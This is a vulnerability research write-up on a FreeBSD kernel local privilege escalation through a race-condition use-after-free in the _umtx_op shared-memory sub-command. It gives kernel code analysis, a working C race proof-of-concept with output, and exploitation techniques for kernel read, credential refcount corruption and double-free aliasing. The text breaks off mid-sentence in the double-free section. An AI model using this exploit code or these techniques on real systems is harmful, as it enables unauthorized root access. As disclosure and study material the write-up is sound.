FreeBSD 11.0+ Kernel LPE: Userspace Mutexes (umtx) Use-After-Free Race Condition
chrisIntroduction
Since 11.0-RELEASE, the FreeBSD kernel contained a race condition
vulnerability in the _umtx_op syscall leading to an
exploitable use-after-free. It affects up to and including the latest
release at time of writing, 14.1-RELEASE.
This report discusses the vulnerability in depth and explores exploitation options, leading to one that results in gaining root privileges from any unprivileged user.
I had previously discovered the vulnerability last year sometime, but it’s now been publicly discovered and patched by Synacktiv as of September, 2024. As I hadn’t done anything with my research beforehand, I’ll now share it here.
Vulnerability Overview
FreeBSD 11.0 introduced the _umtx_op syscall for
implementing userland threading primitives. The syscall takes an
“operation” argument that describes the sub-command to perform.
Sub-commands are provided for dealing with mutexes, condition variables,
semaphores and other objects one would associate with threading.
One of the _umtx_op sub-commands is
UMTX_OP_SHM. This sub-command is used for managing
process-wide shared memory handles: creating them, destroying them and
looking them up.
This UMTX_OP_SHM sub-command suffers from a race
condition when it comes to destroying a shared memory handle and this is
the crux of the vulnerability: by racing the destruction of the same
handle at the same time, it’s possible for the destruction logic to run
twice. Racing this with a third thread can result in a file descriptor
with a dangling struct shmfd pointer through its
f_data field.
An in-depth discussion with full details can be found in the Vulnerability Details section.
Exploitation Options
By reallocating into the UAF hole and interacting with the file
descriptor obtained through the vulnerability, we are able to read and
write to other structures on the heap. To make use of this, we need to
understand what other data we could have reallocated into the hole and
then look for interesting ways to manipulate it through the relevant
fileops table: shm_ops in this case.
The struct shmfd is allocated from the general purpose
heap rather than a dedicated zone, greatly increasing our options for
reallocating into the hole. Even with this fact, however, there does not
seem to be an immediately straight-forward option here.
A much simpler approach is to leverage the vulnerability to cause a
double-free in the kernel. Double-frees are not detected by the FreeBSD
kernel and by inducing this condition, we are able to free ourselves
from being limited to shm_ops for interacting with the
backing data: we are able to alias two completely different objects
instead.
Full details of how this works to our advantage are covered in the Exploitation section.
Vulnerability Details
The prototype for the _umtx_op syscall can be found in
/usr/include/sys/umtx.h:
int _umtx_op(void *obj, int op, u_long val, void *uaddr, void *uaddr2);
The entry point in kernel for this syscall is in
sys/kern/kern_umtx.c:
int
sys__umtx_op(struct thread *td, struct _umtx_op_args *uap)
{
static const struct umtx_copyops *umtx_ops;
umtx_ops = &umtx_native_ops;
#ifdef __LP64__
if ((uap->op & (UMTX_OP__32BIT | UMTX_OP__I386)) != 0) {
if ((uap->op & UMTX_OP__I386) != 0)
umtx_ops = &umtx_native_opsi386;
else
umtx_ops = &umtx_native_opsx32;
}
#elif !defined(__i386__)
/* We consider UMTX_OP__32BIT a nop on !i386 ILP32. */
if ((uap->op & UMTX_OP__I386) != 0)
umtx_ops = &umtx_native_opsi386;
#else
/* Likewise, UMTX_OP__I386 is a nop on i386. */
if ((uap->op & UMTX_OP__32BIT) != 0)
umtx_ops = &umtx_native_opsx32;
#endif
[1] return (kern__umtx_op(td, uap->obj, uap->op, uap->val, uap->uaddr1,
uap->uaddr2, umtx_ops));
}
Some accommodation for 32-bit processes running on a 64-bit kernel
are made here, but otherwise our interest follows to
kern__umtx_op [1].
static int
kern__umtx_op(struct thread *td, void *obj, int op, unsigned long val,
void *uaddr1, void *uaddr2, const struct umtx_copyops *ops)
{
struct _umtx_op_args uap = {
.obj = obj,
.op = op & ~UMTX_OP__FLAGS,
.val = val,
.uaddr1 = uaddr1,
.uaddr2 = uaddr2
};
if ((uap.op >= nitems(op_table)))
return (EINVAL);
[2] return ((*op_table[uap.op])(td, &uap, ops));
}
This function very simply prepares an argument structure and calls
off into a function pointer from the op_table table [2].
Looking at this table, we can see a full list of all of the supported
operations:
static const _umtx_op_func op_table[] = {
#ifdef COMPAT_FREEBSD10
[UMTX_OP_LOCK] = __umtx_op_lock_umtx,
[UMTX_OP_UNLOCK] = __umtx_op_unlock_umtx,
#else
[UMTX_OP_LOCK] = __umtx_op_unimpl,
[UMTX_OP_UNLOCK] = __umtx_op_unimpl,
#endif
[UMTX_OP_WAIT] = __umtx_op_wait,
[UMTX_OP_WAKE] = __umtx_op_wake,
[UMTX_OP_MUTEX_TRYLOCK] = __umtx_op_trylock_umutex,
[UMTX_OP_MUTEX_LOCK] = __umtx_op_lock_umutex,
[UMTX_OP_MUTEX_UNLOCK] = __umtx_op_unlock_umutex,
[UMTX_OP_SET_CEILING] = __umtx_op_set_ceiling,
[UMTX_OP_CV_WAIT] = __umtx_op_cv_wait,
[UMTX_OP_CV_SIGNAL] = __umtx_op_cv_signal,
[UMTX_OP_CV_BROADCAST] = __umtx_op_cv_broadcast,
[UMTX_OP_WAIT_UINT] = __umtx_op_wait_uint,
[UMTX_OP_RW_RDLOCK] = __umtx_op_rw_rdlock,
[UMTX_OP_RW_WRLOCK] = __umtx_op_rw_wrlock,
[UMTX_OP_RW_UNLOCK] = __umtx_op_rw_unlock,
[UMTX_OP_WAIT_UINT_PRIVATE] = __umtx_op_wait_uint_private,
[UMTX_OP_WAKE_PRIVATE] = __umtx_op_wake_private,
[UMTX_OP_MUTEX_WAIT] = __umtx_op_wait_umutex,
[UMTX_OP_MUTEX_WAKE] = __umtx_op_wake_umutex,
#if defined(COMPAT_FREEBSD9) || defined(COMPAT_FREEBSD10)
[UMTX_OP_SEM_WAIT] = __umtx_op_sem_wait,
[UMTX_OP_SEM_WAKE] = __umtx_op_sem_wake,
#else
[UMTX_OP_SEM_WAIT] = __umtx_op_unimpl,
[UMTX_OP_SEM_WAKE] = __umtx_op_unimpl,
#endif
[UMTX_OP_NWAKE_PRIVATE] = __umtx_op_nwake_private,
[UMTX_OP_MUTEX_WAKE2] = __umtx_op_wake2_umutex,
[UMTX_OP_SEM2_WAIT] = __umtx_op_sem2_wait,
[UMTX_OP_SEM2_WAKE] = __umtx_op_sem2_wake,
[3] [UMTX_OP_SHM] = __umtx_op_shm,
[UMTX_OP_ROBUST_LISTS] = __umtx_op_robust_lists,
[UMTX_OP_GET_MIN_TIMEOUT] = __umtx_op_get_min_timeout,
[UMTX_OP_SET_MIN_TIMEOUT] = __umtx_op_set_min_timeout,
};
This gives us a good idea of what the _umtx_op syscall
is really about. For the purpose of this vulnerability, we’re interested
in the UMTX_OP_SHM operation, which is implemented by
__umtx_op_shm [3].
UMTX_OP_SHM
__umtx_op_shm extracts the two key parameters that came
in from the _umtx_op syscall and passes them down to
umtx_shm:
static int
__umtx_op_shm(struct thread *td, struct _umtx_op_args *uap,
const struct umtx_copyops *ops __unused)
{
return (umtx_shm(td, uap->uaddr1, uap->val));
}
umtx_shm is where the main logic lives:
static int
[1] umtx_shm(struct thread *td, void *addr, u_int flags)
{
struct umtx_key key;
struct umtx_shm_reg *reg;
struct file *fp;
int error, fd;
[2] if (__bitcount(flags & (UMTX_SHM_CREAT | UMTX_SHM_LOOKUP |
UMTX_SHM_DESTROY| UMTX_SHM_ALIVE)) != 1)
return (EINVAL);
if ((flags & UMTX_SHM_ALIVE) != 0)
return (umtx_shm_alive(td, addr));
[3] error = umtx_key_get(addr, TYPE_SHM, PROCESS_SHARE, &key);
if (error != 0)
return (error);
KASSERT(key.shared == 1, ("non-shared key"));
if ((flags & UMTX_SHM_CREAT) != 0) {
[4] error = umtx_shm_create_reg(td, &key, ®);
} else {
[5] reg = umtx_shm_find_reg(&key);
if (reg == NULL)
error = ESRCH;
}
umtx_key_release(&key);
if (error != 0)
return (error);
KASSERT(reg != NULL, ("no reg"));
if ((flags & UMTX_SHM_DESTROY) != 0) {
[6] umtx_shm_unref_reg(reg, true);
} else {
#if 0
#ifdef MAC
error = mac_posixshm_check_open(td->td_ucred,
reg->ushm_obj, FFLAGS(O_RDWR));
if (error == 0)
#endif
error = shm_access(reg->ushm_obj, td->td_ucred,
FFLAGS(O_RDWR));
if (error == 0)
#endif
[7] error = falloc_caps(td, &fp, &fd, O_CLOEXEC, NULL);
if (error == 0) {
shm_hold(reg->ushm_obj);
[8] finit(fp, FFLAGS(O_RDWR), DTYPE_SHM, reg->ushm_obj,
&shm_ops);
td->td_retval[0] = fd;
fdrop(fp, td);
}
}
[9] umtx_shm_unref_reg(reg, false);
return (error);
}
This function isn’t too long, but there are a few paths that we need
to understand here. At a high level and before diving into details, it’s
useful to know that the whole purpose of this UMTX_SHM_OP
is to manage a registry of shared memory regions: it lets us create new
regions and look up or destroy existing ones.
Beginning with the function signature [1], we see that our controlled
inputs to the function are pretty simple: void *addr and
u_int flags.
umtx shared memory regions are identified/keyed by virtual addresses
in our process and that’s what addr is here. It doesn’t
matter what’s stored at addr in our process – we just have
to provide some memory address as a key.
flags is used to communicate what we want to do to the
region mapped to that addr. It must be one of [2]:
UMTX_SHM_CREAT: Create a new SHMUMTX_SHM_LOOKUP: Look up an existing SHMUMTX_SHM_DESTROY: Destroy an existing SHMUMTX_SHM_ALIVE: Probe if an address maps to a SHM
We will ignore UMTX_SHM_ALIVE here because it’s largely
uninteresting.
With flags validated to just be one of these, the kernel
then translates addr to a umtx_key [3] and
begins doing work based on what was asked.
For UMTX_SHM_CREAT, the kernel uses
umtx_shm_create_reg to allocate a fresh
umtx_shm_reg:
struct umtx_shm_reg {
TAILQ_ENTRY(umtx_shm_reg) ushm_reg_link;
LIST_ENTRY(umtx_shm_reg) ushm_obj_link;
struct umtx_key ushm_key;
struct ucred *ushm_cred;
struct shmfd *ushm_obj;
u_int ushm_refcnt;
u_int ushm_flags;
};
This is the structure that’s part of the global linked list of shared memory regions. There are some important fields to pay particular attention to here:
ushm_refcntis a refcount for the entry.ushm_objis the actual shared memory object attached to the registry.
The ushm_obj can live longer than its registry entry, so
it has its own refcount (->shm_refs).
The umtx_shm_create_reg function will create a new
shmfd with ->shm_refs == 1 and a new
umtx_shm_reg with ushm_refcnt == 2. The
refcount is 2 because we have one reference in the registry list and one
for the caller.
If instead of UMTX_SHM_CREAT the kernel is servicing a
UMTX_SHM_LOOKUP or UMTX_SHM_DESTROY action
then an existing SHM needs to be resolved with
umtx_shm_find_reg [5].
If that function succeeds in finding one, it takes a reference on
->ushm_refcnt and returns it.
Either way, if no error occurred then the kernel will now have a
umtx_shm_reg pointer and own one reference.
Continuing on in the code, if the requested action was
UMTX_SHM_DESTROY then umtx_shm_unref_reg is
called with its last argument as true [6]. This function
decrements the ->ushm_refcnt and if the last argument is
true then it also removes it from the registry.
Otherwise, for UMTX_SHM_CREAT or
UMTX_SHM_LOOKUP, the kernel allocates a new file descriptor
[7] and attaches the struct shmfd from the registry entry
to the file [8].
Since a pointer to the struct shmfd is being stored on
the file, a reference on that object is taken with
shm_hold.
Finally we reach umtx_shm_unref_reg for all 3 of these
actions [9]: this drops the refcount taken when it was looked up or
created.
Refcounting and Locking
Referring back to the code in the previous subsection, it’s
interesting to note that locking is only performed when creating or
looking for a umtx_shm_reg.
For example, to look up an existing umtx_shm_reg, the
kernel uses umtx_shm_find_reg:
static struct umtx_shm_reg *
umtx_shm_find_reg(const struct umtx_key *key)
{
struct umtx_shm_reg *reg;
mtx_lock(&umtx_shm_lock);
reg = umtx_shm_find_reg_locked(key);
mtx_unlock(&umtx_shm_lock);
return (reg);
}
Similarly, when a reference is dropped on the
umtx_shm_reg, locking is done internally:
static bool
umtx_shm_unref_reg_locked(struct umtx_shm_reg *reg, bool force)
{
bool res;
mtx_assert(&umtx_shm_lock, MA_OWNED);
KASSERT(reg->ushm_refcnt > 0, ("ushm_reg %p refcnt 0", reg));
reg->ushm_refcnt--;
res = reg->ushm_refcnt == 0;
if (res || force) {
if ((reg->ushm_flags & USHMF_REG_LINKED) != 0) {
TAILQ_REMOVE(&umtx_shm_registry[reg->ushm_key.hash],
reg, ushm_reg_link);
reg->ushm_flags &= ~USHMF_REG_LINKED;
}
if ((reg->ushm_flags & USHMF_OBJ_LINKED) != 0) {
LIST_REMOVE(reg, ushm_obj_link);
reg->ushm_flags &= ~USHMF_OBJ_LINKED;
}
}
return (res);
}
static void
umtx_shm_unref_reg(struct umtx_shm_reg *reg, bool force)
{
vm_object_t object;
bool dofree;
if (force) {
object = reg->ushm_obj->shm_object;
VM_OBJECT_WLOCK(object);
vm_object_set_flag(object, OBJ_UMTXDEAD);
VM_OBJECT_WUNLOCK(object);
}
mtx_lock(&umtx_shm_lock);
dofree = umtx_shm_unref_reg_locked(reg, force);
mtx_unlock(&umtx_shm_lock);
if (dofree)
umtx_shm_free_reg(reg);
}
This locking ensures that the reference counting is consistent
amongst other things, but it also fails to protect
umtx_shm_find_reg from finding a umtx_shm_reg
that’s in the process of being destroyed.
Consider what happens when UMTX_SHM_DESTROY is
serviced:
umtx_shm_regis found withumtx_shm_find_reg(->ushm_refcnt++)umtx_shm_unref_regcalled withforce == true(->ushm_refcnt--)umtx_shm_unref_regcalled withforce == false(->ushm_refcnt--)
The net effect of this operation is to decrease
ushm_refcnt by 1. Until step 2 is completed, however, it’s
still possible to find the same umtx_shm_reg with
umtx_shm_find_reg.
Therefore, by racing two concurrent UMTX_SHM_DESTROY
actions for the same addr, it’s possible to have a net
effect of decreasing the ushm_refcnt by 2 instead.
This is the core vulnerability.
Refcount Analysis
By considering two concurrent threads, Thread A and Thread B, both
executing a UMTX_SHM_DESTROY for the same SHM, we can see
how the refcount value fluctuates.
We start with a simple umtx_shm_reg in the registry. In
this state, ->ushm_refcnt == 1 and
->ushm_obj->shm_refs == 1.
We will use the numbered steps for our analysis:
umtx_shm_find_reg=>->ushm_refcnt++umtx_shm_unref_reg(..., true)=>->ushm_refcnt--umtx_shm_unref_reg(..., false)=>->ushm_refcnt--
One possible scenario is:
- Thread A: Step 1 =>
->ushm_refcnt++=>->ushm_refcnt == 2 - Thread B: Step 1 =>
->ushm_refcnt++=>->ushm_refcnt == 3 - Thread A: Step 2 =>
->ushm_refcnt--=>->ushm_refcnt == 2 - Thread B: Step 2 =>
->ushm_refcnt--=>->ushm_refcnt == 1 - Thread A: Step 3 =>
->ushm_refcnt--=>->ushm_refcnt == 0=>umtx_shm_regFREED- As
umtx_shm_regis freed,shm_dropis done on->ushm_obj ->ushm_obj->shm_refs--=>->ushm_obj->shm_refs == 0=>shmfdFREED
- As
- Thread B: Step 3 =>
->ushm_refcnt--=>->ushm_refcnt == -1(on freed data)
There are only a couple of ways this race can play out because if
either thread hits Step 2 before the other hits Step 1, the
ushm_mtx_reg won’t be found. So this is really the only
possible net effect of the race: the last
umtx_shm_unref_reg operates on freed data.
Introduction of a Third Thread
The discovery that the final umtx_shm_unref_reg operates
on freed data is only mildly interesting on first glance. Surely to be
of use we’d have to race an allocation before that last call and have
the decrement be meaningful?
Consider instead what happens if we introduce a third thread to this
race – but this time the thread is performing a
UMTX_SHM_LOOKUP:
- Thread A: Step 1 =>
->ushm_refcnt++=>->ushm_refcnt == 2 - Thread B: Step 1 =>
->ushm_refcnt++=>->ushm_refcnt == 3 - Thread C:
umtx_shm_find_reg=>->ushm_refcnt++=>->ushm_refcnt == 4 - Thread A: Step 2 =>
->ushm_refcnt--=>->ushm_refcnt == 3 - Thread B: Step 2 =>
->ushm_refcnt--=>->ushm_refcnt == 2 - Thread A: Step 3 =>
->ushm_refcnt--=>->ushm_refcnt == 1 - Thread B: Step 3 =>
->ushm_refcnt--=>->ushm_refcnt == 0=>umtx_shm_regis FREED- As
umtx_shm_regis freed,shm_dropis done on->ushm_obj ->ushm_obj->shm_refs--=>->ushm_obj->shm_refs == 0=>shmfdFREED
- As
- Thread C:
- Allocate fd in process (
falloc_caps) shm_hold(reg->ushm_obj->shm_refs)- Attach
reg->ushm_obj(freed) to allocatedfile(finit) ->ushm_refcnt--=>->ushm_refcnt == -1
- Allocate fd in process (
Now because Thread B reached Step 3 before Thread C could call
shm_hold, Thread C has allocated a file in the
process with a dangling f_data: it points to the freed
struct shmfd.
It is of course possible for this race to turn out differently:
Thread C could call shm_hold before Thread B hits Step 3,
in which case f_data will not be dangling.
We can detect the right condition by inspecting the file we get back from Thread C. But before we even do that, we need to check that:
_umtx_op(UMTX_SHM_DESTROY)in Thread A returned 0 (=> success)._umtx_op(UMTX_SHM_DESTROY)in Thread B returned 0 (=> success)._umtx_op(UMTX_SHM_LOOKUP)in Thread C returned >0 (=> success, file descriptor returned).
When all of these conditions are detected, we can then try to trigger
a controlled allocation into the correct kernel malloc
bucket and read some value from our file descriptor to see if it
contains a value we chose.
Looking at shmfd, there are a few candidate fields:
struct shmfd {
vm_ooffset_t shm_size;
vm_object_t shm_object;
vm_pindex_t shm_pages; /* allocated pages */
int shm_refs;
uid_t shm_uid;
gid_t shm_gid;
mode_t shm_mode;
int shm_kmappings;
/*
* Values maintained solely to make this a better-behaved file
* descriptor for fstat() to run on.
*/
struct timespec shm_atime;
struct timespec shm_mtime;
struct timespec shm_ctime;
struct timespec shm_birthtime;
ino_t shm_ino;
struct label *shm_label; /* MAC label */
const char *shm_path;
struct rangelock shm_rl;
struct mtx shm_mtx;
int shm_flags;
int shm_seals;
/* largepage config */
int shm_lp_psind;
int shm_lp_alloc_policy;
};
Reading out of them requires using a function from the
shm_ops table:
struct fileops shm_ops = {
.fo_read = shm_read,
.fo_write = shm_write,
.fo_truncate = shm_truncate,
.fo_ioctl = shm_ioctl,
.fo_poll = invfo_poll,
.fo_kqfilter = invfo_kqfilter,
.fo_stat = shm_stat,
.fo_close = shm_close,
.fo_chmod = shm_chmod,
.fo_chown = shm_chown,
.fo_sendfile = vn_sendfile,
.fo_seek = shm_seek,
.fo_fill_kinfo = shm_fill_kinfo,
.fo_mmap = shm_mmap,
.fo_get_seals = shm_get_seals,
.fo_add_seals = shm_add_seals,
.fo_fallocate = shm_fallocate,
.fo_fspacectl = shm_fspacectl,
.fo_flags = DFLAG_PASSABLE | DFLAG_SEEKABLE,
};
We do need to be careful, however: some of these functions will
attempt to interact with structures such as the
struct rangelock – and these are expected to contain
legitimate kernel pointers.
The shm_get_seals function is one good candidate, which
can be invoked through fcntl(fd, F_GET_SEALS) and simply
returns the value of ->shm_seals. It should be noted
that this field isn’t present on older versions of FreeBSD, however.
One field that has existed since _umtx_op was first
introduced is shm_mode. This is the file permissions mode
of the shmfd and it’s initialised to O_RDWR
when a shmfd is allocated by
umtx_shm_create_reg:
static int
umtx_shm_create_reg(struct thread *td, const struct umtx_key *key,
struct umtx_shm_reg **res)
{
struct umtx_shm_reg *reg, *reg1;
...
reg = uma_zalloc(umtx_shm_reg_zone, M_WAITOK | M_ZERO);
reg->ushm_refcnt = 1;
bcopy(key, ®->ushm_key, sizeof(*key));
reg->ushm_obj = shm_alloc(td->td_ucred, O_RDWR, false);
...
Attempting to fchmod (via shm_chmod) to the
same mode will always succeed, but if we’ve replaced the
shm_mode field with something like zeroes, this will
fail.
Therefore, once we’ve observed the desired return values from
_umtx_op across all 3 threads, our next steps should
be:
- Try to force a kernel allocation of zeroes.
- Attempt to
fchmod(thread_c_result, O_RDWR).
If the fchmod fails then we know that we’ve triggered
the exact sequence of thread execution that we need.
Strategy Proof-of-Concept
With a strategy in hand, we can now write a proof-of-concept that should trigger the vulnerability.
We will assume a modern version of FreeBSD and opt to read the
shm_seals field to detect a successful kernel allocation.
For simplicity, we will use a bogus ioctl(2) call to
attempt a controlled allocation into the correct bucket.
The ioctl(2) technique only gives a transient allocation
– enough to place data for a test – but we will use something more
stable, such as cap_ioctls_limit when building a
functioning exploit (discussed later).
The code for the strategy PoC is:
/*
* cc -pthread -o umtx-poc umtx-poc.c
*/
#define _WANT_FILE
#include <err.h>
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/cpuset.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/umtx.h>
#include <unistd.h>
static volatile int a_ready = 0;
static volatile int b_ready = 0;
static volatile int c_ready = 0;
static volatile int a_result = 0;
static volatile int b_result = 0;
static volatile int c_result = 0;
static void
pin_thread_to_cpu(int which)
{
cpuset_t cs;
CPU_ZERO(&cs);
CPU_SET(which, &cs);
if (-1 == cpuset_setaffinity(CPU_LEVEL_WHICH, CPU_WHICH_TID, -1, sizeof(cs), &cs))
err(1, "[%s] cpuset_setaffinity", __FUNCTION__);
}
static void *
thread_a(void *key)
{
pin_thread_to_cpu(1);
a_ready = 1;
while (!b_ready && !c_ready);
a_result = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_DESTROY, key, NULL);
return NULL;
}
static void *
thread_b(void *key)
{
pin_thread_to_cpu(2);
b_ready = 1;
while (!a_ready && !c_ready);
b_result = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_DESTROY, key, NULL);
return NULL;
}
static void *
thread_c(void *key)
{
pin_thread_to_cpu(0);
c_ready = 1;
while (!a_ready && !b_ready);
c_result = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_LOOKUP, key, NULL);
return NULL;
}
int
main(int argc, char *argv[])
{
char key = 0;
pthread_t ta;
pthread_t tb;
pthread_t tc;
unsigned char aaaa_buffer[sizeof(struct shmfd)];
int seals;
int shmfd;
/* prepare the spray buffer. */
memset(aaaa_buffer, 0x41, sizeof(aaaa_buffer));
/* pin to same CPU as Thread C: */
pin_thread_to_cpu(0);
printf("[+] racing...\n");
for (;;) {
a_ready = 0;
b_ready = 0;
c_ready = 0;
a_result = 0;
b_result = 0;
c_result = 0;
/* create a SHM for the threads to find, but close the fd. */
if (-1 == (shmfd = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_CREAT, &key, NULL)))
err(1, "[%s] _umtx_op", __FUNCTION__);
close(shmfd);
if (pthread_create(&ta, NULL, thread_a, &key) ||
pthread_create(&tb, NULL, thread_b, &key) ||
pthread_create(&tc, NULL, thread_c, &key))
errx(1, "[%s] pthread_create failed", __FUNCTION__);
if (pthread_join(ta, NULL) ||
pthread_join(tb, NULL) ||
pthread_join(tc, NULL))
errx(1, "[%s] pthread_join failed", __FUNCTION__);
if (!a_result && !b_result && c_result > 0) {
/* check if we now have a dangling shmfd in c_result: */
ioctl(-1, _IOW(0, 0, aaaa_buffer), aaaa_buffer);
if (0x41414141 == (seals = fcntl(c_result, F_GET_SEALS))) {
printf("[+] success! shm_seals: 0x%x\n", seals);
break;
}
}
close(c_result);
}
return 0;
}
This works as expected:
$ cc -pthread -o umtx-poc umtx-poc.c && ./umtx-poc
[+] racing...
[+] success! shm_seals: 0x41414141
Exploitation
Triggering the umtx vulnerability leaves us in a state where we have
a file descriptor to a file that has a freed
struct shmfd hanging from its f_data pointer.
As demonstrated at the end of the previous section, we can trivially
reallocate into this freed memory and observe the effects.
The shape of a struct shmfd on the latest release at
time of writing is:
struct shmfd {
vm_ooffset_t shm_size;
[1] vm_object_t shm_object;
vm_pindex_t shm_pages; /* allocated pages */
int shm_refs;
uid_t shm_uid;
gid_t shm_gid;
mode_t shm_mode;
int shm_kmappings;
/*
* Values maintained solely to make this a better-behaved file
* descriptor for fstat() to run on.
*/
struct timespec shm_atime;
struct timespec shm_mtime;
struct timespec shm_ctime;
struct timespec shm_birthtime;
ino_t shm_ino;
struct label *shm_label; /* MAC label */
[2] const char *shm_path;
struct rangelock shm_rl;
struct mtx shm_mtx;
int shm_flags;
int shm_seals;
/* largepage config */
int shm_lp_psind;
int shm_lp_alloc_policy;
};
This is an interesting structure to have control over. Some example fields that could be useful:
shm_object: This will be a danglingvm_object_tpointer. Reallocating thatvm_object_tcould provide a nice primitive: e.g. if we can have it reallocated as thevm_object_tbacking a file that we’re only able to open forO_RDONLY, the permissions we have on theshmfd(inshm_mode) may allow us tommapthe file asPROT_READ | PROT_WRITE. Using this to gain write access to something like/etc/libmap.confwould lead to a trivial privilege escalation.shm_path: We can gain an arbitrary read through this pointer by controlling it and callingfcntl(fd, F_KINFO). That ends up reachingshm_fill_kinfo_locked, which will do astrlcpyfrom that address into a buffer to return to userland. Systematically increasing thatshm_paththen allows us to read onwards past'\0'bytes.
Many of the ways we interact with this file descriptor will result in
one of the specialised fileops functions being called. For
this specific type of file, the relevant fileops table is
shm_ops:
struct fileops shm_ops = {
.fo_read = shm_read,
.fo_write = shm_write,
.fo_truncate = shm_truncate,
.fo_ioctl = shm_ioctl,
.fo_poll = invfo_poll,
.fo_kqfilter = invfo_kqfilter,
.fo_stat = shm_stat,
.fo_close = shm_close,
.fo_chmod = shm_chmod,
.fo_chown = shm_chown,
.fo_sendfile = vn_sendfile,
.fo_seek = shm_seek,
.fo_fill_kinfo = shm_fill_kinfo,
.fo_mmap = shm_mmap,
.fo_get_seals = shm_get_seals,
.fo_add_seals = shm_add_seals,
.fo_fallocate = shm_fallocate,
.fo_fspacectl = shm_fspacectl,
.fo_flags = DFLAG_PASSABLE | DFLAG_SEEKABLE,
};
As noted in the previous section, many of these functions interact
with the struct shmfd in a way that expects valid kernel
pointers to exist. This complicates things for targeting some of the
shmfd fields. For example, many of the operations will try
to acquire a range lock, interacting with queues and pointers on both
shm_rl and shm_mtx.
Kernel information disclosure vulnerabilities are not rare on FreeBSD, but it still feels sub-optimal to rely on further vulnerabilities to make good use of this bug.
Writing through shm_uid / shm_gid
One of the shm_ops functions that avoids referencing
pointers from the shmfd struct is
shm_chown:
static int
shm_chown(struct file *fp, uid_t uid, gid_t gid, struct ucred *active_cred,
struct thread *td)
{
struct shmfd *shmfd;
int error;
error = 0;
[1] shmfd = fp->f_data;
mtx_lock(&shm_timestamp_lock);
#ifdef MAC
error = mac_posixshm_check_setowner(active_cred, shmfd, uid, gid);
if (error != 0)
goto out;
#endif
[2] if (uid == (uid_t)-1)
uid = shmfd->shm_uid;
[3] if (gid == (gid_t)-1)
gid = shmfd->shm_gid;
if (((uid != shmfd->shm_uid && uid != active_cred->cr_uid) ||
[4] (gid != shmfd->shm_gid && !groupmember(gid, active_cred))) &&
(error = priv_check_cred(active_cred, PRIV_VFS_CHOWN)))
goto out;
[5] shmfd->shm_uid = uid;
[6] shmfd->shm_gid = gid;
out:
mtx_unlock(&shm_timestamp_lock);
return (error);
}
This function provides the implementation of fchown for
a shmfd and is fairly simple. First, the shmfd
pointer (pointer to the freed data we can control) is taken at [1]. The
uid and gid arguments to fchown
are considered next: we can pass -1 as either of these to
leave each value unchanged, which is handled at [2] and [3].
Next is a permissions check. If we’re attempting to change
shm_uid to anything other than our current
cr_uid, or if we’re trying to change shm_gid
to a group to which we’re not a member [4], then this will fail.
Otherwise the fields are written [5], [6].
Targeting shm_uid and shm_gid this way is
potentially interesting: whatever value happens to be in memory for
those fields can be replaced with our current uid and
gid (or any gid we’re a member of).
We would have to find a useful struct to allocate into this memory
that has a useful field at the shm_uid and
shm_gid offsets, of course.
Looking at the size of struct shmfd, we can see that
struct ucred comes from the same bucket – and
ucreds are astonishingly allocated from the general purpose
heap instead of a dedicated zone in FreeBSD:
user@freebsd:~ $ lldb /boot/kernel/kernel
(lldb) target create "/boot/kernel/kernel"
Current executable set to '/boot/kernel/kernel' (x86_64).
(lldb) p sizeof(struct shmfd)
(unsigned long) $0 = 208
(lldb) p sizeof(struct ucred)
(unsigned long) $1 = 256
shm_gid happens to overlap the cr_ref
refcount field of ucred:
(lldb) p &((struct shmfd *)0)->shm_gid
(gid_t *) $2 = 0x0000000000000020
(lldb) p &((struct ucred *)0)->cr_ref
(u_int *) $3 = 0x0000000000000020
This means that by allocating into the shmfd hole with a
ucred, we can change the refcount of that
ucred to whatever our gid happens to be. By
changing the refcount to be lower than it should be, we can then trigger
a premature free of the ucred and reallocate a new
credential of our choosing into that hole.
There are many ways to bump the refcount of a ucred; a
simple technique is to make lots of threads. Each created thread will
add to the refcount and reaping will take from it.
While this strategy seems workable, it is somewhat brittle as it relies on these two structures always overlapping in a fruitful way. Rather than continue with this, I opted to focus on a different approach and instead turn the bug into a double-free. This provides us with a much richer exploitable state.
Expanding Options via Double-Free
The FreeBSD kernel does not detect double-frees. This is useful
because if we’re able to turn our use-after-free into a double-free, it
expands the set of objects that we’re able to alias: we would no longer
be restricted to considering what can be manipulated through
shm_ops, but instead through whichever other types we’re
able to combine.
The FreeBSD kernel heap allocator works in a LIFO fashion. This still
applies for double-freed elements, too: if we free the same
virtual address twice then the next two allocations from
malloc will return that same virtual address. This
behaviour lets us alias any two objects that come from the same
bucket.
In investigating how we might be able to free our dangling
shmfd again, it’s tempting to consider placing a fake
shmfd using a kernel reallocation primitive (e.g
ioctl as we used in Strategy Proof-of-Concept) and ensuring
the shm_refs field is set to 1.
Then, by calling close on our file descriptor, we’ll
cause the kernel to call shm_close on our file, which
simply does shm_drop on our prepared data:
void
shm_drop(struct shmfd *shmfd)
{
vm_object_t obj;
if (refcount_release(&shmfd->shm_refs)) {
#ifdef MAC
mac_posixshm_destroy(shmfd);
#endif
rangelock_destroy(&shmfd->shm_rl);
mtx_destroy(&shmfd->shm_mtx);
obj = shmfd->shm_object;
if (!shm_largepage(shmfd)) {
VM_OBJECT_WLOCK(obj);
obj->un_pager.swp.swp_priv = NULL;
VM_OBJECT_WUNLOCK(obj);
}
vm_object_deallocate(obj);
[1] free(shmfd, M_SHMFD);
}
}
We really just want to reach that free at [1], but in
order to get there, the kernel will be interacting with various other
fields such as shm_object. shm_object is
expected to be a legitimate kernel pointer and since it’s located
before the shm_refs field, we’re obliged to
provide a value if we plan on placing a fake shmfd.
It turns out that there’s a different route we can take to triggering
this free at [1].
Recall that the vulnerability gives as a file descriptor with a
dangling shmfd pointer. If we now do another
UMTX_SHM_CREAT operation then we will create a new
umtx_shm_reg and a new shmfd:
umtx_shm_reghas a refcount of 1shmfdhas a refcount of 2- Our dangling
shmfdwill point to the same address as this newshmfd
The shmfd has a refcount of 2 because
UMTX_SHM_CREAT returns us a file descriptor. If we close
that file descriptor, the shmfd will now have a refcount of
1.
We can now call close on our vulnerable file descriptor.
That will call shm_close, which will call
shm_drop on the dangling shmfd. Since the
dangling shmfd now aliases the new shmfd we
just created, this will free the new shmfd while keeping
the umtx_shm_reg in the registry.
Now the umtx_shm_reg entry holds a dangling
